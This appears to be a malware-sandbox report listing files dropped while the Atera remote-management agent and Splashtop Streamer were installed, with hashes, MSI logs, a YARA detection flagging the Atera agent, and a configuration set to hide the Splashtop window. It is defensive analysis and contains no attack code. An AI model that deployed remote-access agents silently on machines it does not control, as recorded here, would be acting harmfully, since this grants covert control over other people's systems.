                                                                                                                                                                                                                                                                                                                                  MD5:9368F227F2D233BECEECDC39F7DCF10C
                                                                                                                                                                                                                                                                                                                                  SHA1:C411AC59670511A71D58E4146A390C9E517FC522
                                                                                                                                                                                                                                                                                                                                  SHA-256:89FEC915186F771EA75E806B37951B415A87D9091BAE6C503F045092254A9705
                                                                                                                                                                                                                                                                                                                                  SHA-512:6C01018D4B434CC4549DAE4238DF31871721174C22E4CACECF365F259AB5E22800823E741BD4F07073A7BF6D4A4A85A8AF8FBFDD8157F06A6C7D59B46E9B53C6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.5240144682942764
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5o6Tq9h5h44TUqPq3F7XGbcXQOD8qzIzQf7KjLdQkimJFWRQVi1x+h9eZNjsWsU+:5Ioqu8bXCKjL5JFE8aCezCyU
                                                                                                                                                                                                                                                                                                                                  MD5:EDB4E3317B95E16A448B0CD9282AE23A
                                                                                                                                                                                                                                                                                                                                  SHA1:0F6E826BD5C7C642334855AA206DA5038F29EEEF
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB75EEB18BDA565003475DE62EF5C37CA005D2809C0DA6FDCDEB82C07B6A71FF
                                                                                                                                                                                                                                                                                                                                  SHA-512:4E353AB569B7A5177F776584EBD28E70CBA33ACB6589FC4BC1F698FCD9B4C5EDC16AB0E770C3C3E98833928FF5F407C953E9609176C3CC0B16B10CF0FAE1557F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1716
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                                                                                  MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                                                                                  SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                                                                                  SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.583727811926715
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5onfZNc5RlRtBfQDZszog95aoGPj+SxY/uvV/AUy1f0BOuIqU21yX1:5i3cdZMZS6JPqlu9/QfF21yl
                                                                                                                                                                                                                                                                                                                                  MD5:BCFD43B53A47B2DCF107EFDCBD0B59A4
                                                                                                                                                                                                                                                                                                                                  SHA1:75B548DF2AECB2DEC9A995C9FF974BE78959411A
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0FA8FF8516C233400FF93675D5091C6747A19287D70C92C470FB30978868FA6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F473CFEF0228F41B471E67AD3DBFE5715BA9AAB9EB541F27445DA87B8944BCD6A3560AB3E5E57A440F8A626B9137FDCD85AA2A50366F67EC61F478B4C7CEA634
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1428
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                                                                                  MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                                                                                  SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                                                                                  SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                                                                                  SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4344504839412293
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kK2LW8AdBb3sJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Ljb3HkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                                                                                  MD5:B73A88184C9EE403D8A1FCB35DEFA4FA
                                                                                                                                                                                                                                                                                                                                  SHA1:ED034C9138558EA310A3169D9D736B1CFAA31F61
                                                                                                                                                                                                                                                                                                                                  SHA-256:B52FE4F7D4950D63F4C31E608C3EC2458F3A5153C050683C45599A4C8A672812
                                                                                                                                                                                                                                                                                                                                  SHA-512:4A518B4BB0F92218E269C39075E60C0C3C4E128C3589E3437DA529DC1A6D29E5CC57C28A87B889D8A3E0AB65E8DC0DB06B1D4AAA2AFA7DA7FB9B5F22ADC38839
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... .........n.[....(................................................U.d.+.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.018003348401965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kKW4OJUr3CJXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:mmxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                                                                                                                  MD5:3E69D354A4F5CE8A64FE5576177B4C52
                                                                                                                                                                                                                                                                                                                                  SHA1:08DEFD0D6A6CE5982A182CC983F09434BEC028B8
                                                                                                                                                                                                                                                                                                                                  SHA-256:A4BC3BAD2CDCD35D1E7A7BD83748888301604F3832F21CDF62223A5E7D5AA363
                                                                                                                                                                                                                                                                                                                                  SHA-512:B7C657527D4BD4B8DB6F0D281C4D16605F4C1A6654D7FF86ED12EDCD1F9415B21DC2EBC44F20A8329E5C89E5DECBF56930F3E1EB6A31E0F404F69D7681002AE9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ...........W.+..(................j..#*......./......................./.. ........#..+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):404
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9402219756621353
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... .... ....... +..(.................B=.+....a..0....................a..0.. ........b]..+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2131444407465524
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ........{X.5 +..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.995957841613266
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....(....;.i.+..(..................F2*.....n./.....................n./.. ............+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.022939652504942
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....l..../.e +..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1499
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.341844552740347
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):899968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8647754636011666
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:k6kfJdDopPTX8NSBt/5ps9oJfBDGVMlDr:6PDKO6Vf
                                                                                                                                                                                                                                                                                                                                  MD5:8F723330DE8B01616AD3989E43D9C2B5
                                                                                                                                                                                                                                                                                                                                  SHA1:5F3D5A2CD7198979D55566B77FF35B0B14F3C55B
                                                                                                                                                                                                                                                                                                                                  SHA-256:8848B439CFE32CE36D86AC14C51E0452B7A0C3F5CFFB7D9223977C81056F27E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:810386B4D0255DF15DDDE15B187FC3AAAEA658C39AB1606157C6ED35693957CCA72BA0881B3D5B57A7F3E9A607CD14312C2EE55482400798C5FA68E5958A7810
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..E(....................;._....................................$.$.G.l.o.b.a.l.$.$......qQA.....................\.....Z...0...+.0.J.f.p.q.U.8.x.J.e.Y.n.Z.J.W.G.k.L.b.7.o./.C.D.+.A.J.9.U.P.y.A.e.m.R.4.2.m.F.n.1.s.=...........E(......................j.......................zz....Z...0...+.0.L.4.a.O.e.b.x.N.j.h.h.b.5./.j.Q.W.B.P.U.I.O.5.Q.G.B.B.9.J.u.j.a.g.w.S.n.E.d.W.Z.s.=...........E(......................j.....................ik......Z...0...+.1.l.x.y.b.W.0.n.C.1.7.B.p.R.q.E.2.z.U.j.G.p.P.v.E.Y.Q.R.z.e.9.5.u.c.2.b.5.G.K.l.3.I.=...........E(......................j............................Z...0...+.2.B.h.X.a.y.c.E.g.l.r.M.p.p.w.N.v.M.w.9.K.t.G.Z.2.V.g.f.0.p.I.a.3.a.F.3.g.8.S.F.f.Q.=...........E(......................j......................m=.....Z.......+.2.V.t.Q.r.6.7.8.r.5.F.P.8.8.T.K./.o.k.I.m.o.3.e.s.+.d.C.Q.b.3.K.p.r.p.A.Q.d.Q.x.V.c.=..........R2H....................Uz(.................................J...7.8.c.6.8.b.4.a.-.0.1.a.b.-.4.b.b.7.-.9.b.0.b.-.2.c.d.a.a.4.f.a.b.0.7.e.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4178
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.673120457455947
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:Y++MlXOOwLfnetJf81c31crfXe/e8tJr5VA:7+OwLt07mWE
                                                                                                                                                                                                                                                                                                                                  MD5:B0347C322468EC5ED498B8CB59C4FDA0
                                                                                                                                                                                                                                                                                                                                  SHA1:1D90136572F14039F634F186E52ED3046335B96B
                                                                                                                                                                                                                                                                                                                                  SHA-256:093EB9B9BCB9220A91F78EA5B8AE885FB933985A2A723FB905F22D229816520E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBCA596996B015B56F07FBCB755596DA9CE8448491C82308DAB1522EEB2664E7CA9083FDA2E9CFEEB30273AF379A8D6D6A2EEB039355DD941D2D7464544E452D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.2.1. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.2.1.:.6.4.4.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.2.1.:.6.4.4.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.2.1.:.6.4.4.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.a.t.e.r.a.A.g.e.n.t.S.e.t.u.p.6.4._.1._.8._.7._.2...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):602
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7274072014300925
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:H4/x2yiSWatbO152ygUcB8uBDi9s/zQl6MRdRH2nZyNuKW2p:H4ZHtgSUeEs/ccCdRHMZy5B
                                                                                                                                                                                                                                                                                                                                  MD5:FFB4D12FE875342D45A64202C4142D4D
                                                                                                                                                                                                                                                                                                                                  SHA1:AF6B7F366F83EC349C6BF02836FE731844BBA2A5
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D1ACFD3637636801E069991A60D76FB3DA7D748DB3350D076DC5B167733E3A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:974C2686B027E269B82851BA95DC846D00D016DB4E275730F874CFC5EC5D8E426E7C077F74D080430CC114A0E29AF569EBDA263BE4325A7BA29BFD1867DDBE2C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Installation]..INSTALLDIR=C:\Program Files (x86)\Splashtop\Splashtop Remote\..SUPPORTDIR=C:\Windows\TEMP\{82794CC3-3F11-42A7-B032-B323712514EA}\..ProductName=Splashtop Streamer..ProductVersion=3.7.2.0..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UpgradeCode={001F085C-058A-480B-AD56-2940B857C38D}..SRVMODE=0..EXTPATH=C:\Windows\TEMP\unpack\..ISUPGRADE=0..ONEUSERMODE=-1..AUTOUPGRADE=0..VTHIDSKIPOEM=1..SSUDONE=0..INSTVD=1..INSTDRV=0x81..VersionNT=603..STARTSRV=1..SRVFOLDER=Server..WOW64=1..WORKSTATION=1..TEMPFOLDER=C:\Windows\TEMP\..USERINFO=sec_opt=0,confirm_d=0,hidewindow=1..BASEDTYPE=1..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):565996
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8492688597793205
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:iYSMKojqR3hE1l1YyB8IVhY4X+W7nGPdxUjRWpUZo8E6U2crUlnEGoMUmPIX8Rvl:nj04n
                                                                                                                                                                                                                                                                                                                                  MD5:4E8A95ACB377D82F36208E74B3D72C59
                                                                                                                                                                                                                                                                                                                                  SHA1:28641167E8AC56B6BD80829532C15216CB227321
                                                                                                                                                                                                                                                                                                                                  SHA-256:DBB6314356B5CF0202C7E97488045F555B109EEDAA18D81E486E9115740A64B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:B02A7E8A3E696BE9CA457B7CD912FBCF3863D097B1136EA7FBC63C3B1A1A9FD39042097B3DD9C361B24DBF4F0B3C2C8D06F36495095D9E52A8AE830ED9F5CA70
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_000_dotnet_runtime_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.2.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.2.D.C.B.8.E.5.3.-.9.D.2.7.-.4.3.F.D.-.A.A.7.8.-.0.2.8.D.5.8.1.F.E.6.E.5.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.5.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.C.:.3.C.). .[.1.8.:.3.1.:.2.7.:.7.0.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.C.:.3.C.). .[.1.8.:.3.1.:.2.7.:.7.0.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.4.C.:.3.C.). .[.1.8.:.3.1.:.2.7.:.7.0.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.C.7.9.F.6.E.E.C.-.3.A.2.B.-.4.8.7.D.-.A.3.B.6.-.E.D.F.4.0.5.7.B.4.E.4.B.}.v.4.8...1.4.0...2.1.4.5.8.\.d.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):99102
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7993862805978518
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ne89XoKjDiIeN9ebwkJsjBJNJKyF7D7BZbhcui7khSyV2RjHAXNoKW3w:nySjHAXNoKQw
